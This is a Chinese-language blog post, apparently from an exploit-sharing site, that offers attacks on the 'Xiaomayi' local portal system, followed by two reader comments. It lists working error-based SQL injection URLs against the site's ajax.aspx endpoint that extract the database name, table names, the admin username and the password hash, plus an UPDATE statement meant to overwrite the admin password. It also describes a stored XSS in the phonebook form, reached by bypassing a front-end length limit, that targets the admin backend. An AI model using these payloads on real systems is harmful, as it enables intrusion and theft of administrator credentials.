小蚂蚁地方门户系统sql注入与XSS

1.SQL注入:
[php]
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and%20db_name()%3E0--

demo_xiaomayi_co
http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 name from demo_xiaomayi_co.dbo.sysobjects where xtype=CHAR(85))>0--

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 username from Ant_admin)>0-- 出帐号

http://demo.xiaomayi.co/public/ajax.aspx?action=addcomparebuild&cname=a'and (select top 1 password from Ant_admin)>0-- 出密码散列

替换密码
paLhASC5WX1ZUvaBeDN+lQ==,换好后,管理员admin密码就是weiwei0307

这个破鸟,发现是假的`真的需要你自己找办法..

update Ant_admin set password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR' where Username='用户名'--
[php]
2.xss
xss可盲打后台
首页前台的XSS在发布黄页的电话薄首先要注册一个会员,当然这些门户站点都会开放注册登录,注册好之后到发布黄页电话薄的地方。

URL:http://demo.xiaomayi.co/Life/phonebookadd.aspx?action=edit

这边的电话和手机后台都没过滤,不过前台有长度限制,抓包修改一下就OK了,然后提交

2 条评论

  1. hackex

    我对XSS 确实没有怎么了解过,能否请教下您??password='ViBrW10pU1RVIldbWlhUVFYiKV9dWFRRJSRcWlErUCQmUCxeWVlQUydZK19fXSNR' 想了解一下这里的密码是怎么生成的? 要做怎么样的反解密呢?

    1. 0day5
      @hackex

      这个是xxx论坛找到的信息,是错误的...最好的就是搞到一个案例,然后去记录密码。

发表评论